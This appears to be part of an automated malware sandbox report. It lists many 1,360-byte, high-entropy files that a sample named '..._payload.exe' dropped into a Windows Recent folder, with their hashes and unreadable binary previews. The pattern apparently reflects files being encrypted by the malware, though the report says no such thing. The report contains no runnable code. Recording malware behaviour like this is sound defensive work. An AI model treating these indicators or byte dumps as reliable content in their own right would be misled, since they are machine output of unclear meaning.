                                                                                                      Preview:KLIZU.v.29.b...W.1S?....(.'?i...B|Q.Xc...e.z.Z...........)o[....8q.,..z.f.`Q..l@...('.5{.5V.p...... ..dQ._pl...f.7.........y.h.<...=....*....q..Iy.^.~CW..bJ\1......j.{.\PT.?.By..S..........|..6..]d.......U...Q.1.`.8Te9R......w...{ES..$w....Jc_........d>&5#t"..IH......c...bgu.[R,$&..|z..8.S&...G...~.B..no.bM\......h.L.F..Z.._.....W.y. .ly....ax..e...7.sv^(..s.2.3.N.d..T..zH....i........G..~..Z......./..=.,y,_..Q9...T..l.}P..+.\..{]h.....N.Q..TC....]...Uj..}....:[.HCJ.^...$B.~ .0.N...3b......K..q......*.UkO...W..akJ....~.l...N..."u.[2.4..k..K.......,..Hp......r....?5.bI.@................bS.o...v....X...,P]cH.5i.v"9.. .R.LV..z....\ZB....V..IU.W!.9e.Khl..>1.nU....rOY.B+..*dy..l.......2.......N.z*....3...V2.rV..{n..f6.$......Y.X,...a..v.4...!.MT..K=_.b?.....$.`..W..h..o.|P.g[@.3a....vJ4.?[....w...CV..)..}.....h........2...f...I..P...Rk.C..x...a7z.....N.....W..K?b.k...T!...<RQ...R.4v..4..OL.>..z.iG.%a`wj....3.U.[v?....?A.9......0.*.V.3..\L

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KLIZUSIQEN.pdf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.848652591146595
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bjoJkHjylvlUV9Yex4BJyfwn0gvV9gxuGAM3wXZADBe6PDlTWv6bD:/omDyplUXYe+yTg/gqpqDk6PDhWwD
                                                                                                      MD5:BC7CF74CE4AB72A2E8960A9D95D057D8
                                                                                                      SHA1:10ADABE86F4D632FFB1EB1D1856548205A3EFA2C
                                                                                                      SHA-256:E9B67EA41E6F33F2AB3DF293353AF7A7FAC1F7FECDC1EBED470B9057FCFA734C
                                                                                                      SHA-512:AADC763C6941538275A439AE9F5BDB437A6611DD091077EF673D0DFFC863F8048F2362417B1DB9D67971C8FFB93EF2E237870525E112EEB5B264D3359971AE07
                                                                                                      Malicious:false
                                                                                                      Preview:KLIZU|..t.f..]E;.v.u...x.....Byj.6.R....g"O.Y....;.....dC...H.:|T..&..Y.a1n.L..Y..w ..e.]...eC.9...&.G...T..!.M..M.k.....".....+7. .o..2..a!.U|.gD..3.nb\z........W[....'...}P.....ny.^.....i+PG.o......u.yx......[..Z....~..Z\..f.W)j.5.....23/[.......V]V.A.QD..S.m............%.[#...N...!...n...Y0.....pB`.^.Dd%;)..N.6dv...F/.W.e.W.|u..L%........._>........}....4..a.....D.|....k.`.+c..6..'.mhh..B...........&....*.&...&......Q.....6....k.x5..o,o...f....g)....27.......CQ7.......l..Np..:{-...E....X.....N......N.....*S>.CX=...z.....X...EyX....8.F.Jq.N...C....\..l.cl...U...}....5.t..h.A.v..0.)@...za..p...o.$ z........M....z..b..,..EX...)...|?.+.#.._,..R&.@.\]f*...}.de?.0m..k.9n]'j`..k.f...].p.%.0..f.U..U"e..@.O.T.].X..8.gy`)..OB...P.X.d.pS..w..).......;....A...}.:...U......Rs..V...E...8K... ..x.FU..>......p.BC..e...oV>.j;...YT`...VOi.......+0.j....&o..#\@;.g+..7. ..'.C...4^...-U...k.O..w.h...-^.r>......Y.b].z.....Q[.+E$....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KLIZUSIQEN.xlsx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.857239550221158
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bzb8l8tGlM5IuM7aclwup4kf1ap8q9yMqpnu3Io8go4LeZLadUh94Oy/qv6bD:/mjMfsaGwIg108YPgo42aUhuOySwD
                                                                                                      MD5:1E9DF6A1B593899A5D729F4E2DD03BBA
                                                                                                      SHA1:595A8B4240E5D0AC2D0296A4DD4F31C28740F0DD
                                                                                                      SHA-256:F098AE1AE1D951B864B007AF818D21D2EA911BB96268D0A25C9DE637BD4332A8
                                                                                                      SHA-512:8B8EA3CE441A71BA54E0DF7AD5506F9A1CAFAFB3B85522171E7FCFEC3DFF6E3782029A74B33A548F5DE4E101C49B4EEFA2B9C297EAB03BDAC3424D1CED349EF6
                                                                                                      Malicious:false
                                                                                                      Preview:KLIZU,.@.V.Q.z.1.$....'._.A%....TW.7..Hf...<n...7Z.$.-.|...........'uk4.4.B%Z.sz......:f..%.b.A.z..}.2....U,...b=..Y.q#..R.[1L.a..{...N$rIb.z...^_....(>..Qp...+..!C...5....eN[.v...k...\*...=..,.>....M.t..:0nv.P.0.\."j...+.......s...g'.$.....H@...L.....'........c.S....s8...9.X................@.....U...L^..../.L..&.'..o.m...Q.Dwp.Z....cm.......\...s...%m...f.>...P.&..J.._&.mG.\x....)...j.3.....\#v..%..j.8r.Z.1.{.G..M........s.Q!TQ..Q.>S...G.o;\....V..)...)./K.m....c...*_..6..C.'.i.Z....XB..o..:..6.R..d...@.Oy.YL....P..y$......K#.#..D..S.h[$.K.|..7.q`..Iq..Z...m..O..D..-...i..C;.e1..%d.....B.T.r...A....).....}@...9P.a....3*SI.|.Uj.....:u..^..% ..Euxu.F..l.zP.K.$..k......ud.!......+....0.....B!.%.*.<.e.W...ZYu...._.{...z..a0Y...V;n....+GJ...#...^..J......F9.._.B.K.I..z\..$...%ms{..}g...P.Nu.....@x.W..p.n..z...94.~......`A...w. 2...W\......R..N`o,..A.....xj.QJ..p#5A...ZS.|..1.0.f&.,...3.....(.]#V.,..<Y.Nnn..6.A../7.n.|.Y.E.7V(s...._....P#B..+..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KZWFNRXYKI.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.83941624948145
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OOPvTwTon5Zq1rBZZC16RyFWeWuhWTCrc432ilqg0Xnv6bD:DHTwTYjqZBZuAydWuhhc+2sCXwD
                                                                                                      MD5:F00A1865B0FA8F8B3E9733AE213CFD5C
                                                                                                      SHA1:49766354B928D20F8AF5D72547C5C791AEC142D0
                                                                                                      SHA-256:8723DE2E2580BA37F9096DF3AAC09971C0FEA023CA8024EAE2CB0C6A52372B43
                                                                                                      SHA-512:111CCBAD44ABD7BA61BF8A3012ACD7E4ABA208272C4E50415F807FBA25626ADBACE50D5A214F1FFA13EE6E37A927357D5ACD4729AAE08ED0DE14A434EF9A32EF
                                                                                                      Malicious:false
                                                                                                      Preview:KZWFN....u\s....5.=...@.^~...F.'.W7... .6...=2.@.!.M5.u.Q&]....u.\.R...l.".....9..+..Q.E..z.......[z.N.r....fg |.l.^.Om.....A.X...o'..........J.....2...0D=.!.A...6..f.\.(.......c.{vk..._.5......aR...H..*..4....'........<....-./~.;.w|..%.w.;..C..!X..,.(q.x..7E#_D....U..+......f..;".XN.`..X.....S.I.0.......K....^ ..|..x....../.b1..yD....m4e.Y..0.J...(..$p.K...)...\|...u....9..Q...T..oZv.......u..G.mX.pm6...Vb...k.=\..W.....i....0.wwad.`.J.c..R..(..M.].bI.}.w_6..~e.z...\<.......S..7.@..Rg"...E8.(..;.cN{5$. J..9.......X..2..t[...i.....\.vF..P.o...O.].....WF.j.$...=.Xc.8.Z.B.......xA.l.IE...R.B.a....].j.,...8!.e.O.g'...[N..g...V......Q..@.=...X.2..9....N^.....wi..a.)/.....\.:tc..Ni..,..!"GQ3...t..(.C..cl.....x...*\...(..`....Y.`l<.r........w.Z.x&.Iy.Z..h.A..zs.V..p....#..q...w..4..g.0.",.*$..$}qOU...A.f{8...^.n|9..6E8.<.;s./eg.....O;.k.1.....c06..D~.>5..`4..>....B.......a..2.......~.x.5e........xN.. .i..;~..w.m.<.N5..W....~w.........].._.&..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NHPKIZUUSG.docx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.816160773562347
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Bj//KyCyNb0NdDm8jJ+3Jsnpbc75NoGZG9xqHnY43xzFw+fYNVJlZVv6bD:BLCyCysDmj81c5OP9IHY43Hw+gNnlbwD
                                                                                                      MD5:3B15E90ACB8175C542B60DE7E3A6FD94
                                                                                                      SHA1:591DF749A9DBCEF7C174E36BB2CFDC9D509D1783
                                                                                                      SHA-256:02EF63AC96F1418D5354861210E3E094B78F2B1B769B02765D853A9724AF3675
                                                                                                      SHA-512:648E5E8F67EF865637860B441318DB9E515E5FDAA8C07B7BBE50A28B94C6014BD6C510A7E6BCB0E2DB2B7B08ACC636A027FC54E825DCDE60CC018F0B97E978A4
                                                                                                      Malicious:false
                                                                                                      Preview:NHPKI.....>.........S`..$...7.n..]C.'.<.=..........D.W..h...Hs.op...U."..?.Z>..:W(.n..}..$..[.~......x........}..\.F...y.{@..b..0.=.'..NF..5....e......-At...............e.....HA...].[Q.....^eiD9...%hu....y..d..`.{.qY..:.{\..U .n...Ib8..X'ci.... .d..J..e.Z=.#.DR.......h.E.n...=!8}.]f>.wi..+....w0.7.%..}.I}...@.=..!.x,.....M9.y"...k..s:J....0^.*....H.t...S...8`B.D.....r..S;.=\-p.......px......q....C..I,fq.p....a....}../..2.....j\G.|..P..M$...2...Ly..9..........%U......\...3..........7.Z.?.......X..'.Jr.....p.v.[/E.iA...C...,...Np...!.t}..7j.......,.l2E.~R..=.....a_...4C..s.jJ...q.e\C[.^..8.D.....N..........7X.+..5+..nD*.OW~....RUP.+.g.x..3..j..Q.E....r.u.W....E...HVg....r..h`].W8..(X..}...Z.B.~.3MN.-j.......2..=.0n.V(..$O.-.$.sty4.eCB.7O&$...b.j.O....x<t...e....O4?B.".....$n:.`........,@.......<........9.D!..qljG....B=..DCW....;..p.........L...B.c...*.a;..U.EG@..3=t.+...l..aj+G...$.N...UV~6.T.e2..W +..M.=J.>..aC....!...>.cR6.....Oe.c.....12

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIKHQAIQAU.docx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.839613028847706
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:6WM+xpVl6DPhJIXc8gQTOsbjlqxkhcMMj4q9w3flnSgFhcFrv6bD:htgIs3PiIxkCLj4JtSgFhcwD
                                                                                                      MD5:67EB2D9C1B7EE2309AFA960D3C92DBB7
                                                                                                      SHA1:645FCD7739B8AC289873BE8F90F9E211FF5B4A98
                                                                                                      SHA-256:E447EB1FB047433BD1D6D7E89A27A49B890C787DBBAED12D6F3D842B666BF4F8
                                                                                                      SHA-512:D6C3EC39A067E2A04522351180807F92B49F9D1DDE32C728B2062BB6B195E16D6A664F3077A615AF4D01808E8514CEBB93B684F14C11AF57435DE805C9FA0F6A
                                                                                                      Malicious:false
                                                                                                      Preview:NIKHQ......4....n..=..2..'..%.o.=$.o+.Iu..v&...3..~..\..y$4.N\M.......a.....d.......N .2.`..l\.,Y....6....!.........P.0..Cw.r..y........=...<u..5.g=b....X..7....e......&.p)L.W.@#.........LV.t.+.m.\..Y.>.}.8.).....o...k..$........Z.9E.T0......ri/d.......M..{.9.....g...\8...GB...$.....o-.....{.1..JD....r..L.{..v....3.Z%..x'p.)5x...).K.y..:<{+n.c1V(,.>.A...C......g.O[......r...wjg9....ER.....\._|..`1...x....+....UiA.oqv..x.ew..Cj...u.......5..T.J.e..j.vb:..-..-.Qn.2.......U?.\B...];7.....=X:w_$....40...8...mnQ..GM5\9....~.m..1..TW;s..c........E..C.:.R..Q9).....~...a..B..\Ic.!<.-.%l.m..O.V.n.A..]m2\S...j......v....k0 &.82\..,..V.Q...A...B3B*......u^6.......u..v2.C_a.....t...Ji.?5dux...........?..^Ee.....R>AT8Z......'."O.I...:.x...a.1....k...K.;].~.I..&v...#.`...:...}...38D.e.v.h...#%Ea.?..$.p...[........g.X....C.U...*,OS.^.se;E....@.l&@PA..M.^..F...B@....#..x/........g.ck}.E. ..\...Ll..i;x.j}HD.?*3...wZ...DH..F..gT..w.F.a......V.?....<..y.)

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIKHQAIQAU.mp3

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.83481378616966
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AfvGfovf0Yjo1rWn/FdcWVqj/Yc1GC3XPZUXyGKbdcPuARVhjybhGhlv6bD:A2+M4o1an/FSJgc1GIZQ0O/RVlychlwD
                                                                                                      MD5:315A5F892F5119EFF465F9975CDC478B
                                                                                                      SHA1:6038DDF35008E4D763E2C8AA2C9277CE0A91B11F
                                                                                                      SHA-256:1FE3865E4AFE1E438006291F221C866E3A7338A65E15ABDB49A256A65234E6D7
                                                                                                      SHA-512:6FD4A467899FCB731F7A865AE441465D7C245BA8F947EDA26282C58CF29A19FE8A041D51F126691CF3286B7D9361F1D8D6BC7087A1719500C82A5DF693BC14B6
                                                                                                      Malicious:false
                                                                                                      Preview:NIKHQ....Y..gR...9.>.....<*%....fA?..*l.'....CUN!..J.1..U...0.>Hf..&&.+S...wKr..;..&....P"...KMdzX;.0.5...>@...z=.l.*&.l...Pr7a..|".....Q.1\}.R.g.*&.S.Np...E|.2>.P.;....F.....H..........g...IJ...kz|...L......(x.....$<f...i....^1.{.....y..........-6..W..Z5u&.!S...T....?.7.;gr_..>.Z.S.hBTL9.uF...p,..M}..$..Hiq.L..PF+.w..1.c...zJ.>...:.$..E./:b..h..;..Q.>=.'...8w=....KD.>N.~.i....nm*.......JT$@>%....;...B.".c...?%(.L..{.zu...E.....%.et.......u_'.Y^F..>....(..~..|6Z..z.C.!..rg7....mM.0.{..t!.'.g...Gs....W...Bd.._.z...}:8.}...nHI...g.0(........{!_Y......O.+..|...Z..{.n.b_...mnM P..}.Ob.1.B.Dy.Y..e.#Gr+".7y8....6..?+@K<*.w.....^,,/....\..gF..OP...3.ti<.9i~(b6......m4.T.[.......H"R...K.,dZ5:.......e..}.E..x...9.f..[.g.?...j..|.....<...t+.m].R..#,Rc.....Z.=.Q..2.-.X.cK!..[0...h....u.k...9.iGs.O.K........H.5I|...I.D...c..-..ai.e-bX..b..%R.......qM(..........F>....?F..,wJ).. ......\..1...[...........u.X....D..4...k.WS.'f.....j.\i|..,2Lk...T....7....24.U.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIKHQAIQAU.xlsx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.838442451691629
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:T4dqpophIseVWF4OSxaaH9PXi7tCQYXDJt3rOKRTz0odY5zILm7VpFDN+xXoqv6X:U1hbe64OS8adtnr3RCzJ7VrDEx4qwD
                                                                                                      MD5:3384C52928F7399C2D2F07BE95C64D14
                                                                                                      SHA1:D7F6B318D97ABD790A8A82C2A0149470651418C9
                                                                                                      SHA-256:F401408071FB0D73094AAC44B31F2A806F1C404B6654EF75E126512253DDB922
                                                                                                      SHA-512:753C03FE85DF52D0A1119F12FD87E34F2524BD35A4A938205038743C6B99450EBFB3784C6788FC62E740EC4839F6438BCD0BEBB46F67DD20F8D910B9F3920BAB
                                                                                                      Malicious:false
                                                                                                      Preview:NIKHQ..~,.{..\#...,W...*.t.:Vt..Cz.o@13......I....L.&.(.....g..}..iG@..K..^GW.>.=..07c*....E.J.Y[.1|../.W....`..m.u..z.....5.3.UW...eN.F...a8.........%v..%.~.yr7.....j....{./.d......."9/.F...;...l/.*.A,.B..%... .U......Uq.E.,J..j"fR.@h#....62...a/s.-......cx|.b..1`c.m.5.j'US.....?......@..H /.D.gs7........M.l...:5......DX...7Oa..eHy.WF/.....uW..k...k...6%..=.:.@..7..KD....>@.......dB...;.8.+|.\...[p+`f......H.a.,.6)......f...P..K.r.=.....2.E..FQ...s.......<s.ym.&vG..~.....0..e/......ghf.wS.\..m}.54...v..7_'...Y...w].U%.RB.A..U.j.......[.....1.]....Kv...(.v1EY../...3...f.24'..rolB.5.X......S..`xc%~...P....Qs=....lm..D.S.'....OPJig&O.9.q8.#....,#..l!.K.d....$....6.r.v..N..@F........X..y;a......OR...{1..a..,uzU...~>....v...`..m.&.r.LF%...".y.l.7..@.a.t.Za....T...K~...$.TG.hg...kM..8.5.....[.2.p.P....Hw*....].CE..J..=.0-P...M..8N....]...8.[.|.0....D.&..+....M............>y..0?u..............;.A....xd*.t.eo.\.9.D.~.L....~.....m.t7..q@.g......*L.YU.>..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWTVCDUMOB.jpg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.852768161556921
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:R6Q5+TWfMZs4ftwvS6ArEGaWEDswRfrFS+Mj4B5uX8leGMmY7xjKR/DW0Zv6bD:wqDfiFtwArP52j5R8C0XGjQ0d6KwD
                                                                                                      MD5:3DBF6D87F8BD0532C7AD64DE9BF3E151
                                                                                                      SHA1:804FD497915E4693BE676F635C72F7AFE0C75F39
                                                                                                      SHA-256:6CD44092E07414AD64DFE28F85A246210C6DE4C578D4B43413BC487FC3506EB7
                                                                                                      SHA-512:A03F3AD23063519CE6578B7041ACF863D676724470745AC9F8393EE36AB9AEACB32D03508AE1BD091E5A5D8EADDE1F8957CA1B3DB116253B3569B5FD215094D6
                                                                                                      Malicious:false
                                                                                                      Preview:NWTVC*dUc...J.W..AnN..o1..>>....O.4P.32c<.W..E.!M..UR.5x"|yo...%M.L.. .. .A..V...:O.*G..t.i........$AQ.)?.q..}-_...d.S.A...._Dt_h.].&.W..N....%6[o..q...vtD./.v.Y..^...&".;.. .!.!dJp.T..B........i..j.......j.h..d...lv....D..jH...X..D%.....~8.'j.*..5.'...`.!d.8.B....V.p.+..,/..]. ..^.A ..x......o...#.*6yE...<.@...C._.v.E.[..L...RG.^..A.o..v..2~..jdr...Q.#..N......2..f9.8w...._..).6Dq.....A..pi.$.1vr..=!i...Mq..s...%t..gv.jvf4%.C..9.VA"d.p2..76...6L+tk.T.Z..~.+^2..c"i...6.E.z..?$.@..C.{U.......,.0.{...Z...54.!..\zD'. .K.L....rD7b^8f..;..........[$....71P*..r7mO.;....}B5........o....u.r...h...>..S..q;.0..=.[...!3...h.~..Y.{[..\.=.w...f..v..G.H.D.ET...........f.tr.......GC..s.[.L..-.z.J.[..X./*p...?.y..SX......O3.1.N.......[.i.... E.......bJ.IS........Sp...*h.6K+.....I@....Q>......W...1K..B.|'.\.J.....#..Z....q;...'.H38w*.>yT\XW._.&....;8..m4j..K..&'].|.g.v....L.6.|C..*tZY....T.8...b.n.P..*c.j.!4..K.mFqo.....Z.W....]...d}^5...,.{.X.C#.(...

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWTVCDUMOB.mp3

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.855149801304833
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:JTdqqmRZMG9gEbjZYSuWnwIMM1YxZgEJjpOVTCd0dSu9v6bD:JcqmR3gEbjuWnw+Yx9Fd8wD
                                                                                                      MD5:815A67889AA7D7CD3BCD29C46D59E3D9
                                                                                                      SHA1:F77563108E4A14ABDB97D9F1230C9E1D9EF59FBD
                                                                                                      SHA-256:57369C5E6CA2E0CD85248A6D7008528E1D51C2E847A1CB0076050779525A4E11
                                                                                                      SHA-512:9A8204D8C814AA9B3E08665771D0FC424158E82ADEAF618558DE96FE92A2DAF00294769D5EEC9E61BF584854410506C6F8005D5277E460AD14A6C5DE8A95C925
                                                                                                      Malicious:false
                                                                                                      Preview:NWTVC...*%Lj.O.$[.W.....4+yy.,r.}.l&.......@x......#.Q...i.c...b45..+P.Ui.....h.x...Z..H.O....s..2.m..S.4..E..as[.&i....a.oH.T.V.%?.ho...!3I6{0.J.a.......t..D.....Au..g..p~..C.0y.W\/...B(.bL........j.?.IX.^....... .)!.........S@.|/2....J..Cy..~.....}g.6.\W.>.N.J.p.1.t.N.......(.v.w.8.{..3).M...#...7.[.../e..h.O.B...-..8..y#>D.zA.z.3k.,F..."....U...@.3..^..a{....nCH.._.o&.qze..:.=X...Q..RC.4.v8s..2.uI{..D...x3@.1.T.H!.*.e.kp.xO.l>].*...~.S|BO.W..>.u...xql..".z.....m.e..@.._...Lr....c.l.-r.8kK{J;...LM...A....F....^.thX..Tn....Rg.....CUyC.Y|....X)Y:Rl.]&..;.z..)9...6L{k..I~2.^....U..',T.E.K....#...U......0_.;.J....X.e7....MA.>.-...'.Ha,.-.i.'...Ql.Xm.i..G_.$_.J....&.y....!9.w.[.I$!.....Z.........@"9../.Jq.s......j...4...\iW../@.J.-...9.<:aln...N...d2...q......_....}......$...k.+..;..\8..v..V.7F.....Mi.Ly...@"....C..0.0...=... n!...7.d.9...P...p..M$.W.....s.H.F...w...N.......B.w._......a.H1..9f.k.)h.c..n{.m=.a. ...|..{..E..d...0.z.#. .........|..})M

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWTVCDUMOB.pdf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.84399333182094
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bRa6AqUzVi5RzGWijDEAqub/azD4tAcoF+EFfvCQoI+HkZ2OSz6sZVSob5OLv6bD:bM6MEGWijIAqgG+foF+8f6bg2hzhVS6R
                                                                                                      MD5:F827BACCFDF88F4D1D2243CC969A061F
                                                                                                      SHA1:0AEE64D90E006D3A1EB2AD5F5A5BDFB0D5666692
                                                                                                      SHA-256:5D63DB387AF614629E92EEDAA410E073B6D4133740E31E3145F45B0192175552
                                                                                                      SHA-512:57033D98DC41D94551A3C505D7BE8C7E18007EDE1F0F0C2099B27863199D5DD44F324665A0AE58D2C15AA4F4593BBF92821096CAE536FD7287D9028387919AC5
                                                                                                      Malicious:false
                                                                                                      Preview:NWTVCu.p...^..ng.}..1+...B......q......^...g..b....[2$.m.3.......E[{.H...|.j.R]6......./S..s9.p..=....J...Z......7...6.2)d7.................m......*.~uV.*Y.J...eB....>..:.s..H..v1C.9P../..........-Pi3..D$.....qcqS.n.{.~oi.ZZ.n"...>!..@.....R.qq...Q.!T.(.....[....`1.M._..].:&...BrcP.FgO.PA.h.|..t...B.!.)........J..61\.....L....O|...jk..Y.$.wM..n....~G..@|..Pw.x.U[....8=]...~..UD.N........R....v]..-.."0..%.I.f....m....!2n#...z.......tq.U...g'].pt.9......+...P.h.y]<.v._..|.W.`..7.'E......?...+\.a.\3SyE..$.F..8...SL.P.%.);F.)...7'.].D.....=.......=7..Y..c.F6..^..7....E1.S.#A#..m6.O..#....[.D.Q..Ff...X.ON{i....J.:.-.F..M+.G...8.s.$=.uk ....o...:P`.WYC....m.8'..G$.Uy......T...].......4v.7..e.m....7\2...U.1..t..%..YH1.M.x.D....,..l...p:a.B...)..\S...c}OR"b.....6....G..X.9.,.C..[#......H...9:!.(f.....-9...M..f..!...wZ.>.N4(-.V..n.4...k..j...uvE..E..Ze..4....T.X....r9..\.R..9Pj..{.xd..3F.~{:.8.n.U.2.#..i|B..k....<.[.N.9...s.f..O..*'..PO.n

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OMCLGRQDIB.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.863411774619105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:L31ttIbXf02rLroPByJorQY+Qua8O6UbXWuj5LJDi8YHjln4tv6bD:D1tebXf02nrq0KZuOb9YCtwD
                                                                                                      MD5:EAD93F2AA7E2D8197FCC69F57BF4D1C3
                                                                                                      SHA1:E94DB828F5E9D1719C9A55C2F1467CAE89920BCB
                                                                                                      SHA-256:9E2399454CD7705803C3B6B35BE6B291AEFF50812E9D423C33F2FB836AD67055
                                                                                                      SHA-512:D8E01FFED0DEF2A02F1249605C87081705CCD1547327AABC0A76F358D5B4AE8B9DA312DD49482B82338F975DA987B0541E0ED3A8F30765A6057C8BD0A3443E92
                                                                                                      Malicious:false
                                                                                                      Preview:OMCLG....eM.v...~.n.-O#;.X.ge..W.om`......B.7..u.i2.HurV.-.W.......=?..o.Q.h...2.2...6.U......a..c5.....q{.v..*wG.v^E.c..]..U.1)As.....J...<[.......|..]..qc.........r(.......B.*K.5.;..q.#78D.2 ......UI.^...?e.i...,<.e..m2 ..s...f.s.?..'.G...S..P...ps...K...xwS.BR..m...h.i.......#..l{...S.E...Ir..J.....l..^...~'......J.n.a...%..y](.-..B.UH......Y.....A.*U.|...J..b...b.._./...K.....k.NvhlQ...x.8G..W....S.b.D...g....*i.)m.........r(.v.+d.M,.B....:...$.l1....<...H.}z..`u.]D.-./&WA.H..n.....Z.JxO.....b...,.<....\..Je5...F...s.J...#_.c8Z~...}..~.*4.....f.".T.?M.Qj..w.1..zZ/.Mn.^.zi..Z.*.....&.9,..O..'...wU.7(.....9........j}....."f~.S..I;..;....j...T..".&y....G'n..O}..|WY.Iv.....z..j.:...7........x7f...7.."..dB..@.. .Sc&...<....L......Ch...sz.q.C.[.I.....zq.Q...R.Af.(U..$.e{.Y.#..i.......s...&.`..8.Ro.0P....[D...Z.b.Q+_+.y..........B.I.$.j......|u...h.E.u.....P.}8....O.'.O..Q=.....zjt4.cX;./.77..I.}..u..^.P#..1.-..X...D.._..X,..s<~..[K......8.)...

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ONBQCLYSPU.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.862887684838192
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:xWdE78sJY7ulHKYRdK5QjzlrjiMLVCXONMAtUA5YB0v6bD:xWd+xK7udldKOjzlrjBHMAtUASB0wD
                                                                                                      MD5:E0CDDD0C3485D03CD7256B3B01991884
                                                                                                      SHA1:6C9AF03FB01A53E9982A6B67B25C3E7BFF5D5041
                                                                                                      SHA-256:ED5EFFC1F1BF6075AC7A6743241B0D80FE6D45C00A0A0F0D8F6202B55100A460
                                                                                                      SHA-512:67C3E3D66D6A37C5DB6CBE69214E3756A282C13EAFBC7B9477C7304989A8AA14A33941A8E9C9CE404E3FB8B1338B3E694A00625BD161B52E1A8EEF00C1B461A8
                                                                                                      Malicious:false
